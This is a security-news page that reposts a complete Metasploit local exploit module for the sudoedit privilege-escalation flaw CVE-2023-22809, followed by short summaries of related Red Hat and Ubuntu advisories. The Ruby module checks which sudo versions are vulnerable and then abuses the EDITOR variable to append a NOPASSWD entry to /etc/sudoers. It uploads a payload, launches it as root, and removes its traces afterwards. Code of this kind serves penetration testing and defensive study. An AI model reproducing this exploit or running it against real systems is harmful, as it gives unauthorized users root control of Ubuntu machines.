Security
Headlines
HeadlinesLatestCVEs

Headline

Sudoedit Extra Arguments Privilege Escalation

This exploit takes advantage of a vulnerability in sudoedit, part of the sudo package. The sudoedit (aka sudo -e) feature mishandles extra arguments passed in the user-provided environment variables (SUDO_EDITOR, VISUAL, and EDITOR), allowing a local attacker to append arbitrary entries to the list of files to process. This can lead to privilege escalation. by appending extra entries on /etc/sudoers allowing for execution of an arbitrary payload with root privileges. Affected versions are 1.8.0 through 1.9.12.p1. However, this module only works against Ubuntu 22.04 and 22.10. This module was tested against sudo 1.9.9-1ubuntu2 on Ubuntu 22.04 and 1.9.11p3-1ubuntu1 on Ubuntu 22.10.

Packet Storm
#vulnerability#ubuntu#linux#debian#git#pdf#auth#ssh
### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Exploit::Local  Rank = ExcellentRanking  include Msf::Post::Linux::Priv  include Msf::Post::Linux::System  include Msf::Post::File  include Msf::Exploit::EXE  include Msf::Exploit::FileDropper  prepend Msf::Exploit::Remote::AutoCheck  def initialize(info = {})    super(      update_info(        info,        'Name' => 'Sudoedit Extra Arguments Priv Esc',        'Description' => %q{          This exploit takes advantage of a vulnerability in sudoedit, part of the sudo package.          The sudoedit (aka sudo -e) feature mishandles extra arguments passed in the user-provided          environment variables (SUDO_EDITOR, VISUAL, and EDITOR), allowing a local attacker to          append arbitrary entries to the list of files to process. This can lead to privilege escalation.          by appending extra entries on /etc/sudoers allowing for execution of an arbitrary payload with root          privileges.          Affected versions are 1.8.0 through 1.9.12.p1. However THIS module only works against Ubuntu          22.04 and 22.10.          This module was tested against sudo 1.9.9-1ubuntu2 on Ubuntu 22.04, and          1.9.11p3-1ubuntu1 on Ubuntu 22.10.        },        'License' => MSF_LICENSE,        'Author' => [          'h00die', # msf module          'Matthieu Barjole', # original PoC, analysis          'Victor Cutillas' # original PoC, analysis        ],        'Platform' => [ 'linux' ],        'Arch' => [ ARCH_X86, ARCH_X64 ],        'SessionTypes' => [ 'shell', 'meterpreter' ],        'Targets' => [[ 'Auto', {} ]],        'Privileged' => true,        'References' => [          [ 'EDB', '51217' ],          [ 'URL', 'https://github.com/M4fiaB0y/CVE-2023-22809/blob/main/exploit.sh' ],          [ 'URL', 'https://raw.githubusercontent.com/n3m1dotsys/CVE-2023-22809-sudoedit-privesc/main/exploit.sh' ],          [ 'URL', 'https://www.vicarius.io/vsociety/blog/cve-2023-22809-sudoedit-bypass-analysis' ],          [ 'URL', 'https://medium.com/@dev.nest/how-to-bypass-sudo-exploit-cve-2023-22809-vulnerability-296ef10a1466' ],          [ 'URL', 'https://www.synacktiv.com/sites/default/files/2023-01/sudo-CVE-2023-22809.pdf' ],          [ 'URL', 'https://www.sudo.ws/security/advisories/sudoedit_any/'],          [ 'CVE', '2023-22809' ]        ],        'DisclosureDate' => '2023-01-18',        'DefaultTarget' => 0,        'Notes' => {          'Stability' => [CRASH_SAFE],          'Reliability' => [REPEATABLE_SESSION],          'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK, CONFIG_CHANGES]        }      )    )    register_advanced_options [      OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ]),      OptString.new('EDITABLEFILE', [ false, 'A file which can be edited with sudo -e or sudoedit' ]),      OptString.new('SHELL', [ true, 'A shell we can launch our payload from. Bash or SH should be safe', '/bin/sh' ]),      OptInt.new('TIMEOUT', [true, 'The timeout waiting for sudo commands to respond', 10]),    ]  end  def timeout    datastore['TIMEOUT']  end  # Simplify pulling the writable directory variable  def base_dir    datastore['WritableDir'].to_s  end  def get_editable_file    if datastore['EDITABLEFILE'].present?      fail_with(Failure::BadConfig, 'EDITABLEFILE must be a file.') unless file?(datastore['EDITABLEFILE'])      vprint_status("Using user defined EDITABLEFILE: #{datastore['EDITABLEFILE']}")      return datastore['EDITABLEFILE']    end    # we do a rev here to reverse the order since we only want the last entry (the file name), take item 1, then rev it back so its normal. this seemed to    # be the easiest way to do a cut -f -1 (negative one). https://stackoverflow.com/questions/22727107/how-to-find-the-last-field-using-cut    editable_file = cmd_exec('sudo -l -S | grep -E "sudoedit|sudo -e" | grep -E \'\\(root\\)|\\(ALL\\)|\\(ALL : ALL\\)\' | rev | cut -d " " -f 1 | rev')    editable_file = editable_file.strip    if editable_file.nil? || editable_file.empty? || editable_file.include?('a terminal is required to read the password') || editable_file.include?('password for')      return nil    end    return nil unless file?(editable_file)    editable_file  end  def get_sudo_version_from_sudo    package = cmd_exec('sudo --version')    package = package.split(' ')[2] # Sudo version XXX    begin      Rex::Version.new(package)    rescue ArgumentError      # this happens on systems like debian 8.7.1 which doesn't have sudo      Rex::Version.new(0)    end  end  def check    sys_info = get_sysinfo    # Check the app is installed and the version    if sys_info[:distro] == 'ubuntu' || sys_info[:distro] == 'debian'      package = cmd_exec('dpkg -l sudo | grep \'^ii\'')      package = package.split(' ')[2] # ii, package name, version, arch      begin        ver_no = Rex::Version.new(package)      rescue ArgumentError        ver_no = get_sudo_version_from_sudo      end    else      ver_no = get_sudo_version_from_sudo    end    # according to CVE listing, but so much backporting...    minimal_version = '1.8.0'    maximum_version = '1.9.12p1'    exploitable = false    # backporting... so annoying.    # https://ubuntu.com/security/CVE-2023-22809    if sys_info[:distro] == 'ubuntu'      if sys_info[:version].include? '22.10' # kinetic        exploitable = true        maximum_version = '1.9.11p3-1ubuntu1.1'      elsif sys_info[:version].include? '22.04' # jammy        exploitable = true        maximum_version = '1.9.9-1ubuntu2.2'      elsif sys_info[:version].include? '20.04' # focal        maximum_version = '1.8.31-1ubuntu1.4'      elsif sys_info[:version].include? '18.04' # bionic        maximum_version = '1.8.21p2-3ubuntu1.5'      elsif sys_info[:version].include? '16.04'  # xenial        maximum_version = '1.8.16-0ubuntu1.10+esm1'      elsif sys_info[:version].include? '14.04'  # trusty        maximum_version = '1.8.9p5-1ubuntu1.5+esm7'      end    end    if ver_no == Rex::Version.new(0)      return Exploit::CheckCode::Unknown('Unable to detect sudo version')    end    if ver_no < Rex::Version.new(maximum_version) && ver_no >= Rex::Version.new(minimal_version)      vprint_good("sudo version #{ver_no} is vulnerable")      # check if theres an entry in /etc/sudoers that allows us to edit a file      editable_file = get_editable_file      if editable_file.nil?        if exploitable          return CheckCode::Appears("Sudo #{ver_no} is vulnerable, but unable to determine editable file. Please set EDITABLEFILE option manually")        else          return CheckCode::Appears("Sudo #{ver_no} is vulnerable, but unable to determine editable file. OS can NOT be exploited by this module")        end      elsif exploitable        return CheckCode::Vulnerable("Sudo #{ver_no} is vulnerable, can edit: #{editable_file}")      else        return CheckCode::Vulnerable("Sudo #{ver_no} is vulnerable, can edit: #{editable_file}. OS can NOT be exploited by this module")      end    end    CheckCode::Safe("sudo version #{ver_no} may NOT be vulnerable")  end  def exploit    # Check if we're already root    if !datastore['ForceExploit'] && is_root?      fail_with Failure::None, 'Session already has root privileges. Set ForceExploit to override'    end    if get_editable_file.nil?      fail_with Failure::BadConfig, 'Unable to automatically detect sudo editable file, EDITABLEFILE option is required'    end    # Make sure we can write our exploit and payload to the local system    unless writable?(base_dir) && directory?(base_dir)      fail_with Failure::BadConfig, "#{base_dir} is not writable"    end    sys_info = get_sysinfo    # Check the app is installed and the version    fail_with(Failure::NoTarget, 'Only Ubuntu 22.04 and 22.10 are exploitable by this module') unless sys_info[:distro] == 'ubuntu'    fail_with(Failure::NoTarget, 'Only Ubuntu 22.04 and 22.10 are exploitable by this module') unless sys_info[:version].include?('22.04') || sys_info[:version].include?('22.10')    # Upload payload executable    payload_path = "#{base_dir}/.#{rand_text_alphanumeric(5..10)}"    upload_and_chmodx payload_path, generate_payload_exe    register_file_for_cleanup(payload_path)    @flag = Rex::Text.rand_text_alphanumeric(12)    print_status 'Adding user to sudoers'    # we tack on a flag so we can easily grep for this line and clean it up later    command = "EDITOR=\"sed -i -e '$ a `whoami` ALL=(ALL:ALL) NOPASSWD: #{datastore['SHELL']} \# #{@flag}' -- /etc/sudoers\" sudo -S -e #{get_editable_file}"    vprint_status("Executing command: #{command}")    output = cmd_exec command, nil, timeout    if output.include? '/etc/sudoers unchanged'      fail_with(Failure::NoTarget, 'Failed to edit sudoers, command was unsuccessful')    end    if output.include? 'sudo: ignoring editor'      fail_with(Failure::NotVulnerable, 'sudo is patched')    end    output.each_line { |line| vprint_status line.chomp }    print_status('Spawning payload')    # -S may not be needed here, but if exploitation didn't go well, we dont want to bork our shell    # also, attempting to thread off of sudo was problematic, solution was    # https://askubuntu.com/questions/1110865/how-can-i-run-detached-command-with-sudo-over-ssh    # other refs that didn't work: https://askubuntu.com/questions/634620/when-using-and-sudo-on-the-first-command-is-the-second-command-run-as-sudo-t    output = cmd_exec "sudo -S -b sh -c 'nohup #{payload_path} > /dev/null 2>&1 &'", nil, timeout    output.each_line { |line| vprint_status line.chomp }  end  def on_new_session(session)    if @flag      session.shell_command_token("sed -i '/\# #{@flag}/d' /etc/sudoers")      flag_found = session.shell_command_token("grep '#{@flag}' /etc/sudoers")      if flag_found.include? @flag        print_bad("Manual cleanup is required, please run: sed -i '/\# #{@flag}/d' /etc/sudoers")      end    end    super  endend

Related news

RHSA-2023:3742: Red Hat Security Advisory: Red Hat OpenShift Data Foundation 4.13.0 security and bug fix update

Updated images that include numerous enhancements, security, and bug fixes are now available in Red Hat Container Registry for Red Hat OpenShift Data Foundation 4.13.0 on Red Hat Enterprise Linux 9. Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original. Related CVEs: * CVE-2020-16250: A flaw was found in Vault and Vault Enterprise (“Vault”). In the affected versions of Vault, with the AWS Auth Method configured and under certain circumstances, the values relied upon by Vault to validate AWS IAM ident...

RHSA-2023:3264: Red Hat Security Advisory: sudo security update

An update for sudo is now available for Red Hat Enterprise Linux 7.4 Advanced Update Support. Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original. Related CVEs: * CVE-2023-22809: A vulnerability was found in sudo. Exposure in how sudoedit handles user-provided environment variables leads to arbitrary file writing with privileges of the RunAs user (usually root). The prerequisite for exploitation is that the current user must be authorized by the sudoers policy to edit a file using sudoedit.

sudo 1.9.12p1 Privilege Escalation

sudo versions 1.8.0 through 1.9.12p1 local privilege escalation exploit.

Red Hat Security Advisory 2023-0281-01

Red Hat Security Advisory 2023-0281-01 - The sudo packages contain the sudo utility which allows system administrators to provide certain users with the permission to execute privileged commands, which are used for system management purposes, without having to log in as root.

Red Hat Security Advisory 2023-0287-01

Red Hat Security Advisory 2023-0287-01 - The sudo packages contain the sudo utility which allows system administrators to provide certain users with the permission to execute privileged commands, which are used for system management purposes, without having to log in as root.

Red Hat Security Advisory 2023-0292-01

Red Hat Security Advisory 2023-0292-01 - The sudo packages contain the sudo utility which allows system administrators to provide certain users with the permission to execute privileged commands, which are used for system management purposes, without having to log in as root.

Red Hat Security Advisory 2023-0283-01

Red Hat Security Advisory 2023-0283-01 - The sudo packages contain the sudo utility which allows system administrators to provide certain users with the permission to execute privileged commands, which are used for system management purposes, without having to log in as root.

RHSA-2023:0291: Red Hat Security Advisory: sudo security update

An update for sudo is now available for Red Hat Enterprise Linux 7. Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original. Related CVEs: * CVE-2023-22809: sudo: arbitrary file write with privileges of the RunAs user

RHSA-2023:0287: Red Hat Security Advisory: sudo security update

An update for sudo is now available for Red Hat Enterprise Linux 6 Extended Lifecycle Support. Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original. Related CVEs: * CVE-2023-22809: sudo: arbitrary file write with privileges of the RunAs user

RHSA-2023:0283: Red Hat Security Advisory: sudo security update

An update for sudo is now available for Red Hat Enterprise Linux 8.6 Extended Update Support. Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original. Related CVEs: * CVE-2023-22809: sudo: arbitrary file write with privileges of the RunAs user

RHSA-2023:0281: Red Hat Security Advisory: sudo security update

An update for sudo is now available for Red Hat Enterprise Linux 9.0 Extended Update Support. Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original. Related CVEs: * CVE-2023-22809: sudo: arbitrary file write with privileges of the RunAs user

Ubuntu Security Notice USN-5811-2

Ubuntu Security Notice 5811-2 - USN-5811-1 fixed a vulnerability in Sudo. This update provides the corresponding update for Ubuntu 16.04 ESM. Matthieu Barjole and Victor Cutillas discovered that Sudo incorrectly handled user-specified editors when using the sudoedit command. A local attacker that has permission to use the sudoedit command could possibly use this issue to edit arbitrary files.

Packet Storm: Latest News

Ivanti EPM Agent Portal Command Execution